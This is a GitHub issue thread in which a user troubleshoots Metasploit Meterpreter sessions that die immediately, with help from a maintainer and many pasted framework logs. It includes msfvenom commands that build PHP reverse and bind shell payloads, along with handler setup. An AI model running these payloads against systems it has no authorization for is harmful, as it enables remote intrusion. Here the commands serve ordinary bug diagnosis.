Metasploit-framework: session 1 closed. Reason: Died
1.
msfvenom -p php/meterpreter_reverse_tcp LHOST=MY IP LPORT=8888 -f raw
but also tried :
msfvenom -p php/meterpreter/reverse_tcp LHOST=MY IP LPORT=8888 -f raw
and lot of other payload and different port but no one works even with the o option to php. Same issue each time
2.
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST MY iP
set LPORT 8888
exploit
port are actually open i've double check that
Expected behavior
The meterpreter should open and stay open
Current behavior
] Started reverse TCP handler on MYIP:8888
[] IP - Meterpreter session 1 closed. Reason: Died
[*] Meterpreter session 1 opened (MYIP:8888 -> IP:49257) at 2020-09-09 10:38:53 -0400
Metasploit version
Framework: 5.0.101-dev
Console : 5.0.101-dev
Additional Information
this issue appears with all the payload and target and every port .
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=php/meterpreter_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LPORT=8888
LHOST=MY IP
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
History
The following commands were ran during the session and before this issue occurred:
Collapse
187 use exploit/multi/handler
188 set payload php/meterpreter_reverse_tcp
189 set LPORT 8888
190 set LHOST MY IP
191 show options
192 exploit
193 version
194 debug
Errors
The following errors occurred before the issue occurred:
Collapse
[09/09/2020 10:36:19] [e(0)] core: Msf::OptionValidateError : One or more options failed to validate: LHOST.
/usr/share/metasploit-framework/lib/msf/core/module/options.rb:21:in `validate'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:64:in `generate'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:25:in `create'
/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:53:in `generate_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:140:in `generate_simple'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:473:in `generate_raw_payload'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:418:in `generate_payload'
/usr/bin/msfvenom:468:in `<main>'
[09/09/2020 10:36:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:33] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:33] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:44:33] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Logs
The following logs were recorded before the issue occurred:
Collapse
[09/07/2020 12:27:08] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/07/2020 12:27:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/07/2020 12:27:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/07/2020 12:28:10] [e(0)] core: Exception encountered in cmd_set - Msf::OptionValidateError The following options failed to validate: Value 'wg-quick down wg0' is not valid for option 'LHOST'.
[09/07/2020 12:28:48] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError An exploitation error occurred.
[09/07/2020 12:30:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/07/2020 12:30:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/07/2020 12:30:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/07/2020 12:30:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/07/2020 12:41:06] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[09/09/2020 08:30:34] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 08:30:34] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 08:30:34] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 08:30:34] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 08:34:09] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/09/2020 08:34:10] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/09/2020 08:34:10] [w(0)] core: Session 1 has died
[09/09/2020 08:34:13] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 09:01:04] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/09/2020 09:01:05] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/09/2020 09:01:05] [w(0)] core: Session 2 has died
[09/09/2020 09:01:05] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 10:34:48] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:34:48] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:34:49] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:34:49] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:18] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:18] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:19] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:19] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:19] [e(0)] core: Msf::OptionValidateError : One or more options failed to validate: LHOST.
/usr/share/metasploit-framework/lib/msf/core/module/options.rb:21:in `validate'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:64:in `generate'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:25:in `create'
/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:53:in `generate_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:140:in `generate_simple'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:473:in `generate_raw_payload'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:418:in `generate_payload'
/usr/bin/msfvenom:468:in `<main>'
[09/09/2020 10:36:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:33] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:33] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:38:53] [w(0)] core: Session 1 has died
[09/09/2020 10:38:54] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 10:44:33] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Version/Install
The versions and install method of your Metasploit setup:
Collapse
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x05ac0684>.
Install Method: Other - Please specify
apollyonfirstcome
All 42 comments
i run metasploit on kali on a virtual machine (VMware)
apollyonfirstcome
on 9 Sep 2020
When you run LHOST=MY IP, are you actually replacing the value MY IP with your local hosts IP address? Also is this an IP address the other machine can reach? Your log output suggests you are using the literal value MY IP in some places.
Also can you confirm if you are only using the PHP Meterpreter payloads or if this is also occuring for you with other payloads such as windows/x64/meterpreter/reverse_tcp or similar? Just want to check if this is a config issue on your side and eliminate some possibilities as whilst my gut feeling says this is a PHP Meterpreter issue, I want to double check you aren't also getting the same issue with other payloads.
gwillcox-r7
on 9 Sep 2020
Yes MY ip = my local ip adress
yes this is an ip reachable by other machine and the port are actually open checked with: https://canyouseeme.org/ and NMAP
yes i try with other payload like linux for a reverse tcp and a bind tcp same issue with all payload even with exploit/multi/script/web_delivery
โโโโโโโ Original Message โโโโโโโ
On Wednesday, September 9, 2020 6:39 PM, Grant Willcox notifications@github.com wrote:
When you run LHOST=MY IP, are you actually replacing the value MY IP with your local hosts IP address? Also is this an IP address the other machine can reach?
Also can you confirm if you are only using the PHP Meterpreter payloads or if this is also occuring for you with other payloads such as windows/x64/meterpreter/reverse_tcp or similar? Just want to check if this is a config issue on your side and eliminate some possibilities as whilst my gut feeling says this is a PHP Meterpreter issue, I want to double check you aren't also getting the same issue with other payloads.
โ
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub, or unsubscribe.
apollyonfirstcome
on 9 Sep 2020
Okay so local IP addresses should not be accessible to other people via tools such as http://canyouseeme.org/ so I'm a little confused by that statement.
The fact that its closing on every payload is unusual though, is there any AV running on the system you are targeting?
gwillcox-r7
on 9 Sep 2020
yes in fact when i say MY IP i mean my vpn ip ( through wireguard if that can help you).
And no there is no AV on my side or in is side.
apollyonfirstcome
on 9 Sep 2020
do you wan't me to post my log for other payload and different port or this will be useless
apollyonfirstcome
on 9 Sep 2020
If you could I'd like to see what you've tried and whats going on a little bit more. The VPN could potentially be an issue but I'd hope not. Though given that from what you are describing its affecting multiple modules I am a little confused. I'm also curious if checking out the 6.x branch thats on GitHub would help you at all if its a known issue that we fixed in a recent release.
gwillcox-r7
on 9 Sep 2020
no unfortunatly i search everyware during 7 days on github before contacting you, to see if someone have the same issue but nothing helpfull. I've also check the document for this king of issue provided by rapid7 but nothing works.
I will test other payload and i send you the log content here . let's me a 30 minute and i give you that.
apollyonfirstcome
on 9 Sep 2020
msfvenom -p php/meterpreter/bind_tcp LHOST=MYIP LPORT=8888 -f raw > /home/MYPC/Desktop/exploittestnew1.php
use exploit/multi/handler
set LHOST MYIP
set LPORT 8888
exploit
OUTPUT :
[] Started reverse TCP handler on 0.0.0.0:8888
[] Command shell session 1 opened (IP:8888 -> IP:56410) at 2020-09-09 14:21:34 -0400
[*] 52.202.215.126 - Command shell session 1 closed.
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=generic/shell_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LHOST=MY VPN IP
LPORT=8888
History
The following commands were ran during the session and before this issue occurred:
Collapse
214 use exploit/multi/handler
215 set LHOST MY VPN IP
216 set LPORT 8888
217 exploit
218 debug
Errors
The following errors occurred before the issue occurred:
Collapse
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:22:49] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Logs
The following logs were recorded before the issue occurred:
Collapse
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:38:53] [w(0)] core: Session 1 has died
[09/09/2020 10:38:54] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 10:44:33] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 13:12:47] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:12:47] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:12:49] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 13:12:49] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 13:15:25] [w(0)] core: Session 1 has died
[09/09/2020 13:15:29] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 13:15:51] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 13:57:45] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:57:45] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:57:46] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 13:57:46] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 13:58:44] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:58:44] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:58:44] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 13:58:45] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:00:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:00:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:00:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:00:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:02:12] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:02:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:02:13] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:02:13] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:03:29] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:07:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:07:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:07:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:07:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:09:11] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:09:11] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:09:13] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:09:13] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:13:39] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:22:49] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Version/Install
The versions and install method of your Metasploit setup:
Collapse
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x05e8227c>.
Install Method: Other - Please specify
msfvenom -p php/meterpreter/bind_tcp LHOST=MYIP LPORT=4444 -f raw > /home/MYCOMPUTERNAME/Desktop/TEST2.php
use exploit/multi/handler
set LHOST MYIP
set LPORT 4444
exploit
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=generic/shell_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LHOST=MY VPN IP
LPORT=4444
History
The following commands were ran during the session and before this issue occurred:
Collapse
230 use exploit/multi/handler
231 set LHOST MY VPN IP
232 set LPORT 4444
233 exploit
234 debug
Errors
The following errors occurred before the issue occurred:
Collapse
[09/09/2020 14:30:49] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:49] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:52] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:52] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:58] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:58] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:59] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:31:58] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:32:04] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Logs
The following logs were recorded before the issue occurred:
Collapse
[09/09/2020 14:00:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:00:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:02:12] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:02:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:02:13] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:02:13] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:03:29] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:07:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:07:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:07:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:07:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:09:11] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:09:11] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:09:13] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:09:13] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:13:39] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:22:49] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:26:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:26:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:26:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:26:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:26:52] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:26:52] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:26:53] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:26:53] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:27:46] [e(0)] core: Exploit failed (multi/handler): Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444 - Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444
[09/09/2020 14:28:56] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:28:56] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:28:59] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:28:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:29:37] [e(0)] core: Exploit failed (multi/handler): Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444 - Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444
[09/09/2020 14:30:49] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:49] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:52] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:52] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:58] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:58] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:59] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:31:58] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:32:04] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Version/Install
The versions and install method of your Metasploit setup:
Collapse
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x0602ff20>.
Install Method: Other - Please specify
unfortunatly i doesn't have a linux machine or a windows machine so i can't put the output for those payload for now.
apollyonfirstcome
on 9 Sep 2020
I think that the problem come from the wg0 interface that metasploit couldn't handle but i not sure .
apollyonfirstcome
on 9 Sep 2020
Hmm so there is this that I see:
[09/09/2020 14:29:37] [e(0)] core: Exploit failed (multi/handler): Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444 - Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444
Its possible you aren't running it with enough permissions for the bind handler to be created?
I also see these errors which are interesting:
[09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
and more specifically this one:
[09/09/2020 13:15:25] [w(0)] core: Session 1 has died
[09/09/2020 13:15:29] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
Not seen those before but they seem related to what is going on here. Shame that it doesn't seem to include the line number and file they are occurring in.
Any chance you could run setg LogLevel 3 and then try it again, then post the last 1000 lines or so of your logs at ~/.msf4/logs/framework.log? Hopefully we can get some line numbers and file names for the offending files and start tracking this down.
gwillcox-r7
on 9 Sep 2020
I just realise that the ip that metasploit receive come from canyouseeme.org ( me cheking that's my port are open : ).so i thinks it's why he couldn't get a session whith this host. But that's doesn't explaine why i couldn't get a session with my payload.
PS: i send you the log file without blanking the ip just so you can laugh about my stupidity ; ) .
apollyonfirstcome
on 9 Sep 2020
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/bind_named_pipe is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp with multi/handler]: reverse to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp with multi/handler]: bind to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp with multi/handler]: noconn to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp with multi/handler]: none to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp with multi/handler]: tunnel to bind
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/bind_tcp is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_rc4 with multi/handler]: reverse to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_rc4 with multi/handler]: bind to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_rc4 with multi/handler]: noconn to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_rc4 with multi/handler]: none to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_rc4 with multi/handler]: tunnel to bind
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/bind_tcp_rc4 is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with multi/handler]: reverse to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with multi/handler]: bind to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with multi/handler]: noconn to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with multi/handler]: none to bind
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with multi/handler]: tunnel to bind
